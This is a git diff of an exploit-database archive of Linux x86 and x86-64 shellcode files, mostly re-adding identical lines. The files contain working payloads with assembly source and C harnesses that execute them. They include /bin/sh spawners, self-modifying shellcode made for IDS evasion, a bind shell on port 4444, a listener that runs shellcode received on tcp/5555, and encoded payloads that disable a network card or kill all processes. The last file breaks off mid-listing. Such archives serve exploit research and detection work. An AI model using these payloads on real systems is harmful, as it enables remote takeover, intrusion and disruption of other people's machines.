+1,29 @@ -# [Linux/X86-64] -# Dummy for shellcode: -# execve("/bin/sh", ["/bin/sh"], NULL) -# hophet [at] gmail.com - -.text - .globl _start -_start: - - xorq %rdx, %rdx - movq $0x68732f6e69622fff,%rbx - shr $0x8, %rbx - push %rbx - movq %rsp,%rdi - xorq %rax,%rax - pushq %rax - pushq %rdi - movq %rsp,%rsi - mov $0x3b,%al # execve(3b) - syscall - - pushq $0x1 - pop %rdi - pushq $0x3c # exit(3c) - pop %rax - syscall - - +# [Linux/X86-64] +# Dummy for shellcode: +# execve("/bin/sh", ["/bin/sh"], NULL) +# hophet [at] gmail.com + +.text + .globl _start +_start: + + xorq %rdx, %rdx + movq $0x68732f6e69622fff,%rbx + shr $0x8, %rbx + push %rbx + movq %rsp,%rdi + xorq %rax,%rax + pushq %rax + pushq %rdi + movq %rsp,%rsi + mov $0x3b,%al # execve(3b) + syscall + + pushq $0x1 + pop %rdi + pushq $0x3c # exit(3c) + pop %rax + syscall + + # milw0rm.com [2006-11-02] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13307.c b/platforms/lin_x86/shellcode/13307.c index 8cf321e4c..bfa612508 100755 --- a/platforms/lin_x86/shellcode/13307.c +++ b/platforms/lin_x86/shellcode/13307.c @@ -1,72 +1,72 @@ -/* - _ __ __ ___ __ - | |/ /__ ____ ____ / |/ /_ __/ /_____ _ - | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ - / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / - /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ - - xenomuta\x40phreaker\x2enet - http://xenomuta.tuxfamily.org/ - Methylxantina 256mg - - Description: - linux/x86 Self-modifying ShellCode for IDS evasion - creates int $0x80 syscalls on runtime. - - OS: Linux - Arch: x86 - Length: 64 bytes ( 35 without /bin/sh payload ) - Author: XenoMuta - - hola at: - str0k3, garay, fr1t0l4y, emra. - - God bless you all - - -=== SOURCE CODE ==== -.globl _start -_start: - jmp _findOut -_WhereAmI: - pop %edx // Save our payload's address g20 - mov %edx, %esi // and save it 4 later -_loopMakeInt80s: - mov (%edx), %eax - cmpw $0x7dca, %ax // Find this guy ( 0x7dca ) and - jne _no - addw $0x303, %ax // 0x7dca + 0x303 == 0x80cd ( int $0x80 ) - mov %eax, (%edx) -_no: - incb %dl - cmp $0x41414141, %eax // Use 'AAAA' as end Marker. - jne _loopMakeInt80s - jmp *%esi // Jump to our converted code when done -_findOut: - call _WhereAmI -_payload: // Paste your shell code here and then replace - xor %edx, %edx // "\xcd\x80" (int $0x80) for .ascii "\xca7d" - push $0xb // and end with .ascii "AAAA" as end marker - pop %eax - cltd - push %edx - push $0x68732f2f - push $0x6e69622f - mov %esp, %ebx - push %edx - push %ebx - mov %esp,%ecx - .ascii "\xca\x7d" // + 0x303 = 0xcd80 (int $0x80) - .ascii "AAAA" -=== SOURCE CODE ==== -*/ - - -char shellcode[] = "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41"; - -int main () -{ - printf("Length: %d bytes\n", strlen(shellcode)); - int (*sc)() = (int (*)())shellcode; - sc(); - return 0; -} - +/* + _ __ __ ___ __ + | |/ /__ ____ ____ / |/ /_ __/ /_____ _ + | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ + / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / + /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ + + xenomuta\x40phreaker\x2enet + http://xenomuta.tuxfamily.org/ - Methylxantina 256mg + + Description: + linux/x86 Self-modifying ShellCode for IDS evasion + creates int $0x80 syscalls on runtime. + + OS: Linux + Arch: x86 + Length: 64 bytes ( 35 without /bin/sh payload ) + Author: XenoMuta + + hola at: + str0k3, garay, fr1t0l4y, emra. + - God bless you all - + +=== SOURCE CODE ==== +.globl _start +_start: + jmp _findOut +_WhereAmI: + pop %edx // Save our payload's address g20 + mov %edx, %esi // and save it 4 later +_loopMakeInt80s: + mov (%edx), %eax + cmpw $0x7dca, %ax // Find this guy ( 0x7dca ) and + jne _no + addw $0x303, %ax // 0x7dca + 0x303 == 0x80cd ( int $0x80 ) + mov %eax, (%edx) +_no: + incb %dl + cmp $0x41414141, %eax // Use 'AAAA' as end Marker. + jne _loopMakeInt80s + jmp *%esi // Jump to our converted code when done +_findOut: + call _WhereAmI +_payload: // Paste your shell code here and then replace + xor %edx, %edx // "\xcd\x80" (int $0x80) for .ascii "\xca7d" + push $0xb // and end with .ascii "AAAA" as end marker + pop %eax + cltd + push %edx + push $0x68732f2f + push $0x6e69622f + mov %esp, %ebx + push %edx + push %ebx + mov %esp,%ecx + .ascii "\xca\x7d" // + 0x303 = 0xcd80 (int $0x80) + .ascii "AAAA" +=== SOURCE CODE ==== +*/ + + +char shellcode[] = "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41"; + +int main () +{ + printf("Length: %d bytes\n", strlen(shellcode)); + int (*sc)() = (int (*)())shellcode; + sc(); + return 0; +} + // milw0rm.com [2009-09-15] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13308.c b/platforms/lin_x86/shellcode/13308.c index 70288eab6..c136b7bc4 100755 --- a/platforms/lin_x86/shellcode/13308.c +++ b/platforms/lin_x86/shellcode/13308.c @@ -1,126 +1,126 @@ -/* - _ __ __ ___ __ - | |/ /__ ____ ____ / |/ /_ __/ /_____ _ - | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ - / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / - /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ - - xenomuta\x40phreaker\x2enet - http://xenomuta.tuxfamily.org/ - Methylxantina 256mg - - Description: - a linux/x86 shellcode that forks a HTTP Server on port tcp/8800 - - OS: Linux - Arch: x86 - Length: 166 bytes - Author: XenoMuta - - hola at: - str0k3, garay, fr1t0l4y, emra. - - God bless you all - - -==== SOURCE CODE ==== -.globl _start -_start: - xor %eax, %eax - mov $0x02, %al - int $0x80 - test %eax, %eax - jz socket - xor %eax, %eax - incb %al - int $0x80 -txt: - pop %ecx - movb $27, %dl - int $0x80 - -close: - movb $0x6, %al - mov %esi, %ebx - int $0x80 - -exit: - mov $0x01, %al - xor %ebx, %ebx - int $0x80 - -socketcall: - pop %esi - mov $0x66, %al - incb %bl - mov %esp, %ecx - int $0x80 - jmp *%esi - -socket: - cltd - xor %eax, %eax - xor %ebx, %ebx - push $0x6 - push $0x1 - push $0x2 - call socketcall - -bind: - mov %eax, %edi - xor %edx, %edx - push %edx - pushw $0x6022 - pushw %bx - mov %esp, %ecx - push $0x10 - push %ecx - push %edi - call socketcall - -listen: - inc %bl - push $0x05 - push %edi - call socketcall - -accept: - xor %ecx, %ecx - push %edx - push %edx - push %edi - call socketcall - -fork: - mov %eax, %esi - xor %eax, %eax - mov $0x02, %al - int $0x80 - test %eax, %eax - jz write - - xor %eax, %eax - mov $0x06, %al - mov %esi, %ebx - int $0x80 - - xor %eax, %eax - xor %ebx, %ebx - mov $0x04, %bl - jmp accept - -write: - mov %esi, %ebx - mov $0x04, %al - call txt - .string "HTTP/1.0 200\r\n\r\n

:)

" -==== SOURCE CODE ==== -*/ -char shellcode[] = "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74\x22\x31\xc0\xfe\xc0\xcd\x80\x59\xb2\x1b\xcd\x80\xb0\x06\x89\xf3\xcd\x80\xb0\x01\x31\xdb\xcd\x80\x5e\xb0\x66\xfe\xc3\x89\xe1\xcd\x80\xff\xe6\x99\x31\xc0\x31\xdb\x6a\x06\x6a\x01\x6a\x02\xe8\xe5\xff\xff\xff\x89\xc7\x31\xd2\x52\x66\x68\x22\x60\x66\x53\x89\xe1\x6a\x10\x51\x57\xe8\xcf\xff\xff\xff\xfe\xc3\x6a\x05\x57\xe8\xc5\xff\xff\xff\x31\xc9\x52\x52\x57\xe8\xbb\xff\xff\xff\x89\xc6\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74\x10\x31\xc0\xb0\x06\x89\xf3\xcd\x80\x31\xc0\x31\xdb\xb3\x04\xeb\xda\x89\xf3\xb0\x04\xe8\x85\xff\xff\xff\x48\x54\x54\x50\x2f\x31\x2e\x30\x20\x32\x30\x30\x0d\x0a\x0d\x0a\x3c\x68\x31\x3e\x3a\x29\x3c\x2f\x68\x31\x3e"; - -int main () -{ - printf("Length: %d bytes\n", strlen(shellcode)); - int (*sc)() = (int (*)())shellcode; - sc(); - return 0; -} - +/* + _ __ __ ___ __ + | |/ /__ ____ ____ / |/ /_ __/ /_____ _ + | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ + / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / + /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ + + xenomuta\x40phreaker\x2enet + http://xenomuta.tuxfamily.org/ - Methylxantina 256mg + + Description: + a linux/x86 shellcode that forks a HTTP Server on port tcp/8800 + + OS: Linux + Arch: x86 + Length: 166 bytes + Author: XenoMuta + + hola at: + str0k3, garay, fr1t0l4y, emra. + - God bless you all - + +==== SOURCE CODE ==== +.globl _start +_start: + xor %eax, %eax + mov $0x02, %al + int $0x80 + test %eax, %eax + jz socket + xor %eax, %eax + incb %al + int $0x80 +txt: + pop %ecx + movb $27, %dl + int $0x80 + +close: + movb $0x6, %al + mov %esi, %ebx + int $0x80 + +exit: + mov $0x01, %al + xor %ebx, %ebx + int $0x80 + +socketcall: + pop %esi + mov $0x66, %al + incb %bl + mov %esp, %ecx + int $0x80 + jmp *%esi + +socket: + cltd + xor %eax, %eax + xor %ebx, %ebx + push $0x6 + push $0x1 + push $0x2 + call socketcall + +bind: + mov %eax, %edi + xor %edx, %edx + push %edx + pushw $0x6022 + pushw %bx + mov %esp, %ecx + push $0x10 + push %ecx + push %edi + call socketcall + +listen: + inc %bl + push $0x05 + push %edi + call socketcall + +accept: + xor %ecx, %ecx + push %edx + push %edx + push %edi + call socketcall + +fork: + mov %eax, %esi + xor %eax, %eax + mov $0x02, %al + int $0x80 + test %eax, %eax + jz write + + xor %eax, %eax + mov $0x06, %al + mov %esi, %ebx + int $0x80 + + xor %eax, %eax + xor %ebx, %ebx + mov $0x04, %bl + jmp accept + +write: + mov %esi, %ebx + mov $0x04, %al + call txt + .string "HTTP/1.0 200\r\n\r\n

:)

" +==== SOURCE CODE ==== +*/ +char shellcode[] = "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74\x22\x31\xc0\xfe\xc0\xcd\x80\x59\xb2\x1b\xcd\x80\xb0\x06\x89\xf3\xcd\x80\xb0\x01\x31\xdb\xcd\x80\x5e\xb0\x66\xfe\xc3\x89\xe1\xcd\x80\xff\xe6\x99\x31\xc0\x31\xdb\x6a\x06\x6a\x01\x6a\x02\xe8\xe5\xff\xff\xff\x89\xc7\x31\xd2\x52\x66\x68\x22\x60\x66\x53\x89\xe1\x6a\x10\x51\x57\xe8\xcf\xff\xff\xff\xfe\xc3\x6a\x05\x57\xe8\xc5\xff\xff\xff\x31\xc9\x52\x52\x57\xe8\xbb\xff\xff\xff\x89\xc6\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74\x10\x31\xc0\xb0\x06\x89\xf3\xcd\x80\x31\xc0\x31\xdb\xb3\x04\xeb\xda\x89\xf3\xb0\x04\xe8\x85\xff\xff\xff\x48\x54\x54\x50\x2f\x31\x2e\x30\x20\x32\x30\x30\x0d\x0a\x0d\x0a\x3c\x68\x31\x3e\x3a\x29\x3c\x2f\x68\x31\x3e"; + +int main () +{ + printf("Length: %d bytes\n", strlen(shellcode)); + int (*sc)() = (int (*)())shellcode; + sc(); + return 0; +} + // milw0rm.com [2009-09-15] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13309.asm b/platforms/lin_x86/shellcode/13309.asm index 6b6c05a97..bf3835777 100755 --- a/platforms/lin_x86/shellcode/13309.asm +++ b/platforms/lin_x86/shellcode/13309.asm @@ -1,80 +1,80 @@ -/* - _ __ __ ___ __ - | |/ /__ ____ ____ / |/ /_ __/ /_____ _ - | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ - / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / - /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ - - xenomuta\x40phreaker\x2enet - http://xenomuta.tuxfamily.org/ - Methylxantina 256mg - - Description: - linux/x86 listens for shellcode on tcp/5555 and jumps to it - OS: Linux - Arch: x86 - Length: 83 bytes - Author: XenoMuta - - greetz to: - str0k3 (tnx for your effort), emra (fragancia), - fr1t0l4y (dejate ver), garay (no me olvido de los pobres ;p ) - - God bless you all - -*/ -.global _start - -_start: - xor %ebx, %ebx - mov %ebx, %eax - -_socket: - push $0x6 - push $0x1 - push $0x2 - mov $0x66, %al - incb %bl - mov %esp, %ecx - int $0x80 - -_bind: - mov %eax, %edi - xor %edx, %edx - push %edx - pushw $0xb315 /* 5555 */ - pushw %bx - mov %esp, %ecx - push $0x10 - push %ecx - push %edi - mov $0x66, %al - incb %bl - mov %esp, %ecx - int $0x80 - -_listen: - incb %bl - push $0x1 - push %edi - mov $0x66, %al - incb %bl - mov %esp, %ecx - int $0x80 - -_accept: - push %edx - push %edx - push %edi - mov $0x66, %al - incb %bl - mov %esp, %ecx - int $0x80 - mov %eax, %ebx - -_read: - mov $0x3, %al - mov %esp, %ecx - mov $0x7ff, %dx - incb %dl - int $0x80 - jmp *%ecx /* Jump to our shellcode */ - +/* + _ __ __ ___ __ + | |/ /__ ____ ____ / |/ /_ __/ /_____ _ + | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ + / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / + /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ + + xenomuta\x40phreaker\x2enet + http://xenomuta.tuxfamily.org/ - Methylxantina 256mg + + Description: + linux/x86 listens for shellcode on tcp/5555 and jumps to it + OS: Linux + Arch: x86 + Length: 83 bytes + Author: XenoMuta + + greetz to: + str0k3 (tnx for your effort), emra (fragancia), + fr1t0l4y (dejate ver), garay (no me olvido de los pobres ;p ) + - God bless you all - +*/ +.global _start + +_start: + xor %ebx, %ebx + mov %ebx, %eax + +_socket: + push $0x6 + push $0x1 + push $0x2 + mov $0x66, %al + incb %bl + mov %esp, %ecx + int $0x80 + +_bind: + mov %eax, %edi + xor %edx, %edx + push %edx + pushw $0xb315 /* 5555 */ + pushw %bx + mov %esp, %ecx + push $0x10 + push %ecx + push %edi + mov $0x66, %al + incb %bl + mov %esp, %ecx + int $0x80 + +_listen: + incb %bl + push $0x1 + push %edi + mov $0x66, %al + incb %bl + mov %esp, %ecx + int $0x80 + +_accept: + push %edx + push %edx + push %edi + mov $0x66, %al + incb %bl + mov %esp, %ecx + int $0x80 + mov %eax, %ebx + +_read: + mov $0x3, %al + mov %esp, %ecx + mov $0x7ff, %dx + incb %dl + int $0x80 + jmp *%ecx /* Jump to our shellcode */ + ; milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13310.c b/platforms/lin_x86/shellcode/13310.c index 90c197a55..f04330e4a 100755 --- a/platforms/lin_x86/shellcode/13310.c +++ b/platforms/lin_x86/shellcode/13310.c @@ -1,51 +1,51 @@ -/* Linux x86 - Polymorphic shellcode for disable Network Card (default eth0) - 75 bytes - * Jonathan Salwan < submit [!] shell-storm.org > - * - * ! DataBase of Shellcodes and you can share your shellcodes : http://www.shell-storm.org/shellcode/ ! - * - * - * Disassembly of section .text: - * - * 08048060 <_start>: - * 8048060: 6a 0b push $0xb - * 8048062: 58 pop %eax - * 8048063: 99 cltd - * 8048064: 52 push %edx - * 8048065: 68 64 6f 77 6e push $0x6e776f64 - * 804806a: 89 e6 mov %esp,%esi - * 804806c: 52 push %edx - * 804806d: 68 65 74 68 30 push $0x30687465 < (eth0) you can change it for other Network card - * 8048072: 89 e1 mov %esp,%ecx - * 8048074: 52 push %edx - * 8048075: 68 6e 66 69 67 push $0x6769666e - * 804807a: 68 69 66 63 6f push $0x6f636669 - * 804807f: 68 69 6e 2f 2f push $0x2f2f6e69 - * 8048084: 68 2f 2f 73 62 push $0x62732f2f - * 8048089: 89 e3 mov %esp,%ebx - * 804808b: 52 push %edx - * 804808c: 56 push %esi - * 804808d: 51 push %ecx - * 804808e: 53 push %ebx - * 804808f: 89 e1 mov %esp,%ecx - * 8048091: cd 80 int $0x80 - * - */ - -main() -{ -char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x51\x80" - "\x6c\x0e\xff\x01\x80\xe9\x01\x75" - "\xf6\xeb\x05\xe8\xea\xff\xff\xff" - "\x6b\x0c\x59\x9a\x53\x69\x65\x70" - "\x78\x6f\x8a\xe7\x53\x69\x66\x75" - "\x69\x31\x8a\xe2\x53\x69\x6f\x67" - "\x6a\x68\x69\x6a\x67\x64\x70\x69" - "\x6a\x6f\x30\x30\x69\x30\x30\x74" - "\x63\x8a\xe4\x53\x57\x52\x54\x8a" - "\xe2\xce\x81"; - - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); -} - +/* Linux x86 - Polymorphic shellcode for disable Network Card (default eth0) - 75 bytes + * Jonathan Salwan < submit [!] shell-storm.org > + * + * ! DataBase of Shellcodes and you can share your shellcodes : http://www.shell-storm.org/shellcode/ ! + * + * + * Disassembly of section .text: + * + * 08048060 <_start>: + * 8048060: 6a 0b push $0xb + * 8048062: 58 pop %eax + * 8048063: 99 cltd + * 8048064: 52 push %edx + * 8048065: 68 64 6f 77 6e push $0x6e776f64 + * 804806a: 89 e6 mov %esp,%esi + * 804806c: 52 push %edx + * 804806d: 68 65 74 68 30 push $0x30687465 < (eth0) you can change it for other Network card + * 8048072: 89 e1 mov %esp,%ecx + * 8048074: 52 push %edx + * 8048075: 68 6e 66 69 67 push $0x6769666e + * 804807a: 68 69 66 63 6f push $0x6f636669 + * 804807f: 68 69 6e 2f 2f push $0x2f2f6e69 + * 8048084: 68 2f 2f 73 62 push $0x62732f2f + * 8048089: 89 e3 mov %esp,%ebx + * 804808b: 52 push %edx + * 804808c: 56 push %esi + * 804808d: 51 push %ecx + * 804808e: 53 push %ebx + * 804808f: 89 e1 mov %esp,%ecx + * 8048091: cd 80 int $0x80 + * + */ + +main() +{ +char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x51\x80" + "\x6c\x0e\xff\x01\x80\xe9\x01\x75" + "\xf6\xeb\x05\xe8\xea\xff\xff\xff" + "\x6b\x0c\x59\x9a\x53\x69\x65\x70" + "\x78\x6f\x8a\xe7\x53\x69\x66\x75" + "\x69\x31\x8a\xe2\x53\x69\x6f\x67" + "\x6a\x68\x69\x6a\x67\x64\x70\x69" + "\x6a\x6f\x30\x30\x69\x30\x30\x74" + "\x63\x8a\xe4\x53\x57\x52\x54\x8a" + "\xe2\xce\x81"; + + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); +} + // milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13311.c b/platforms/lin_x86/shellcode/13311.c index bd38f667b..486864335 100755 --- a/platforms/lin_x86/shellcode/13311.c +++ b/platforms/lin_x86/shellcode/13311.c @@ -1,59 +1,59 @@ -/* - Title: Linux x86 | Polymorphic Shellcode killall5 - 61 bytes - Author: Jonathan Salwan - Mail: submit [!] shell-storm.org - - ! DataBase of shellcode ==> http://www.shell-storm.org/shellcode/ - - - killall5 is the SystemV killall command. It sends a signal to all processes - except the processes in its own session, so it won't kill the shell that is - running the script it was called from. Its primary (only) use is in the rc - scripts found in the /etc/init.d directory. - - - Original Informations - ===================== - - Disassembly of section .text: - - 08048054 <.text>: - 8048054: 31 c0 xor %eax,%eax - 8048056: 50 push %eax - 8048057: 66 68 6c 35 pushw $0x356c - 804805b: 68 6c 6c 61 6c push $0x6c616c6c - 8048060: 68 6e 2f 6b 69 push $0x696b2f6e - 8048065: 68 2f 73 62 69 push $0x6962732f - 804806a: 89 e3 mov %esp,%ebx - 804806c: 50 push %eax - 804806d: 89 e2 mov %esp,%edx - 804806f: 53 push %ebx - 8048070: 89 e1 mov %esp,%ecx - 8048072: b0 0b mov $0xb,%al - 8048074: cd 80 int $0x80 - -*/ - -#include "stdio.h" - -int main(int argc, char *argv[]) -{ - -char shellcode[] = - - "\xeb\x11\x5e\x31\xc9\xb1\x37\x80" - "\x6c\x0e\xff\x01\x80\xe9\x01\x75" - "\xf6\xeb\x05\xe8\xea\xff\xff\xff" - "\x32\xc1\x51\x67\x69\x6d\x36\x69" - "\x6d\x6d\x62\x6d\x69\x6f\x30\x6c" - "\x6a\x69\x30\x74\x63\x6a\x8a\xe4" - "\x51\x8a\xe3\x54\x8a\xe2\xb1\x0c" - "\xce\x81\x41\xce\x81"; - - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - - return 0; -} - +/* + Title: Linux x86 | Polymorphic Shellcode killall5 - 61 bytes + Author: Jonathan Salwan + Mail: submit [!] shell-storm.org + + ! DataBase of shellcode ==> http://www.shell-storm.org/shellcode/ + + + killall5 is the SystemV killall command. It sends a signal to all processes + except the processes in its own session, so it won't kill the shell that is + running the script it was called from. Its primary (only) use is in the rc + scripts found in the /etc/init.d directory. + + + Original Informations + ===================== + + Disassembly of section .text: + + 08048054 <.text>: + 8048054: 31 c0 xor %eax,%eax + 8048056: 50 push %eax + 8048057: 66 68 6c 35 pushw $0x356c + 804805b: 68 6c 6c 61 6c push $0x6c616c6c + 8048060: 68 6e 2f 6b 69 push $0x696b2f6e + 8048065: 68 2f 73 62 69 push $0x6962732f + 804806a: 89 e3 mov %esp,%ebx + 804806c: 50 push %eax + 804806d: 89 e2 mov %esp,%edx + 804806f: 53 push %ebx + 8048070: 89 e1 mov %esp,%ecx + 8048072: b0 0b mov $0xb,%al + 8048074: cd 80 int $0x80 + +*/ + +#include "stdio.h" + +int main(int argc, char *argv[]) +{ + +char shellcode[] = + + "\xeb\x11\x5e\x31\xc9\xb1\x37\x80" + "\x6c\x0e\xff\x01\x80\xe9\x01\x75" + "\xf6\xeb\x05\xe8\xea\xff\xff\xff" + "\x32\xc1\x51\x67\x69\x6d\x36\x69" + "\x6d\x6d\x62\x6d\x69\x6f\x30\x6c" + "\x6a\x69\x30\x74\x63\x6a\x8a\xe4" + "\x51\x8a\xe3\x54\x8a\xe2\xb1\x0c" + "\xce\x81\x41\xce\x81"; + + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + + return 0; +} + // milw0rm.com [2009-08-11] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13312.c b/platforms/lin_x86/shellcode/13312.c index 8f26d2aae..d8ea76fd0 100755 --- a/platforms/lin_x86/shellcode/13312.c +++ b/platforms/lin_x86/shellcode/13312.c @@ -1,48 +1,48 @@ -/* - - Title: Polymorphic Shellcode /bin/sh - 48 bytes - Author: Jonathan Salwan - Mail: submit [!] shell-storm.org - - ! DataBase of shellcode : http://www.shell-storm.org/shellcode/ - - - Original Informations - ===================== - - Disassembly of section .text: - - 08048060 <.text>: - 8048060: 31 c0 xor %eax,%eax - 8048062: 50 push %eax - 8048063: 68 2f 2f 73 68 push $0x68732f2f - 8048068: 68 2f 62 69 6e push $0x6e69622f - 804806d: 89 e3 mov %esp,%ebx - 804806f: 50 push %eax - 8048070: 53 push %ebx - 8048071: 89 e1 mov %esp,%ecx - 8048073: 99 cltd - 8048074: b0 0b mov $0xb,%al - 8048076: cd 80 int $0x80 - - -*/ - -#include "stdio.h" - -char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x32\x80" - "\x6c\x0e\xff\x01\x80\xe9\x01\x75" - "\xf6\xeb\x05\xe8\xea\xff\xff\xff" - "\x32\xc1\x51\x69\x30\x30\x74\x69" - "\x69\x30\x63\x6a\x6f\x8a\xe4\x51" - "\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"; - -int main() -{ - printf("Polymorphic Shellcode - length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - - return 0; -} - +/* + + Title: Polymorphic Shellcode /bin/sh - 48 bytes + Author: Jonathan Salwan + Mail: submit [!] shell-storm.org + + ! DataBase of shellcode : http://www.shell-storm.org/shellcode/ + + + Original Informations + ===================== + + Disassembly of section .text: + + 08048060 <.text>: + 8048060: 31 c0 xor %eax,%eax + 8048062: 50 push %eax + 8048063: 68 2f 2f 73 68 push $0x68732f2f + 8048068: 68 2f 62 69 6e push $0x6e69622f + 804806d: 89 e3 mov %esp,%ebx + 804806f: 50 push %eax + 8048070: 53 push %ebx + 8048071: 89 e1 mov %esp,%ecx + 8048073: 99 cltd + 8048074: b0 0b mov $0xb,%al + 8048076: cd 80 int $0x80 + + +*/ + +#include "stdio.h" + +char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x32\x80" + "\x6c\x0e\xff\x01\x80\xe9\x01\x75" + "\xf6\xeb\x05\xe8\xea\xff\xff\xff" + "\x32\xc1\x51\x69\x30\x30\x74\x69" + "\x69\x30\x63\x6a\x6f\x8a\xe4\x51" + "\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"; + +int main() +{ + printf("Polymorphic Shellcode - length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + + return 0; +} + // milw0rm.com [2009-08-11] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13313.c b/platforms/lin_x86/shellcode/13313.c index 4bba3666b..b65ba299f 100755 --- a/platforms/lin_x86/shellcode/13313.c +++ b/platforms/lin_x86/shellcode/13313.c @@ -1,133 +1,133 @@ -/* - Author: Rick - Email: rick2600@hotmail.com - - OS: Linux/x86 - Description: Port Bind 4444 ( xor-encoded ) - - --------------------------------------------------------------------- -section .text - global _start - -_start: - - ;socket (PF_INET, SOCK_STREAM, 0) - push byte 0x66 - pop eax - push byte 0x01 - pop ebx - xor ecx, ecx - push ecx - push byte 0x01 - push byte 0x02 - mov ecx, esp - int 0x80 - - mov esi, eax ;save file descriptor - - ;bind (sockfd, server, len) - xor edx, edx - push edx - push word 0x5c11 - push word 0x02 - mov ecx, esp - push byte 0x10 - push ecx - push eax - mov ecx, esp - mov bl, 0x02 - push byte 0x66 - pop eax - int 0x80 - - ;listen - mov al, 0x66 - mov bl, 0x04 - int 0x80 - - ;accept - push edx - push esi - mov ecx, esp - inc ebx - push byte 0x66 - pop eax - int 0x80 - - mov ebx, eax ;save file descriptor - - ;dup2(sockfd, 2); dup2(sockfd, 1); dup2(sockfd, 0) - push byte 0x02 - pop ecx - do_dup: - push byte 0x3f - pop eax - int 0x80 - loop do_dup - push byte 0x3f - pop eax - int 0x80 - - - ; execve ("/bin/sh", ["/bin/sh", "-i"], 0); - xor edx, edx - push edx - push 0x68732f6e - push 0x69622f2f - mov ebx, esp - push edx - push word 0x692d - mov ecx, esp - push edx - push ecx - push ebx - mov ecx, esp - push byte 0x0b - pop eax - int 0x80 - - ;exit(0) - push byte 0x01 - pop eax - xor ebx, ebx - int 0x80 --------------------------------------------------------------------- -*/ - -#include -#include - - - -char code[] = -"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34" -"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05" -"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f" -"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff" -"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f" -"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f" -"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e" -"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff" -"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c" -"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21" -"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d" -"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78" -"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff" -"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5" -"\xd3\x9e"; - - - -int main(void) -{ - printf("length: %d\n", strlen(code)); - - void (*shellcode)(); - shellcode = (void *)code; - shellcode(); - return (0); - -} - +/* + Author: Rick + Email: rick2600@hotmail.com + + OS: Linux/x86 + Description: Port Bind 4444 ( xor-encoded ) + + +-------------------------------------------------------------------- +section .text + global _start + +_start: + + ;socket (PF_INET, SOCK_STREAM, 0) + push byte 0x66 + pop eax + push byte 0x01 + pop ebx + xor ecx, ecx + push ecx + push byte 0x01 + push byte 0x02 + mov ecx, esp + int 0x80 + + mov esi, eax ;save file descriptor + + ;bind (sockfd, server, len) + xor edx, edx + push edx + push word 0x5c11 + push word 0x02 + mov ecx, esp + push byte 0x10 + push ecx + push eax + mov ecx, esp + mov bl, 0x02 + push byte 0x66 + pop eax + int 0x80 + + ;listen + mov al, 0x66 + mov bl, 0x04 + int 0x80 + + ;accept + push edx + push esi + 